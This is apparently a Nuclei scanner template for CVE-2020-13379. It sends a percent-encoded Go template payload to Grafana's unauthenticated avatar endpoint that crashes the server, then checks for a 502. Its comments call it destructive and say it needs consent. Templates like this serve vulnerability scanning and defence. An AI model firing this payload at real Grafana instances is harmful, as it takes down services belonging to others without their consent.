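id: cve-2020-13379

info:
  name: Unauthenticated Grafana DoS
  author: pxmme1337
  # Raised from medium: the issue needs no credentials and, per the warning
  # below, takes the whole grafana-server process down. Confirm against the
  # CVSS record for the CVE before relying on this rating.
  severity: high
  description: >-
    The avatar feature in Grafana 3.0.1 through 7.0.1 lacks an access-control
    check and is vulnerable to SSRF: any unauthenticated client can make
    Grafana issue an HTTP request to an arbitrary URL and receive the result.
    The payload used here, taken from the referenced exploit-db entry,
    crashes the grafana-server process (see the warning below).
  reference:
    - https://www.exploit-db.com/exploits/48638
  # 'dos' lets operators exclude this template from routine scans (e.g. an
  # exclude-tags filter); it is destructive and must not run against targets
  # without explicit consent.
  tags: cve,cve2020,grafana,ssrf,dos

# WARNING: this template is destructive. A successful run crashes the
# grafana-server application; there is no non-destructive check in here.

requests:
  - method: GET
    path:
      # Both forms of the avatar path are sent so the template works whether
      # or not the supplied BaseURL carries a trailing slash.
      # The path decodes to /avatar/{{printf "%s" "this.Url"}} - a Go template
      # expression. It is kept percent-encoded so that the scanner's own
      # {{...}} expression handling presumably leaves it alone and Grafana
      # receives the braces intact.
      - '{{BaseURL}}avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D'
      - '{{BaseURL}}/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D'
      # Follow-up request to observe the effect of the two payloads above.
      - '{{BaseURL}}/'

    # A 502 is what a reverse proxy in front of Grafana returns once the
    # backend has gone away. Matching on the status alone is weak evidence:
    # any gateway error - including a target that was already down, or a 502
    # on the first request for unrelated reasons - also matches, and a
    # Grafana reached directly (no proxy) would likely yield a connection
    # error rather than a 502 after it crashes, so that case is missed.
    matchers:
      - type: status
        status:
          - 502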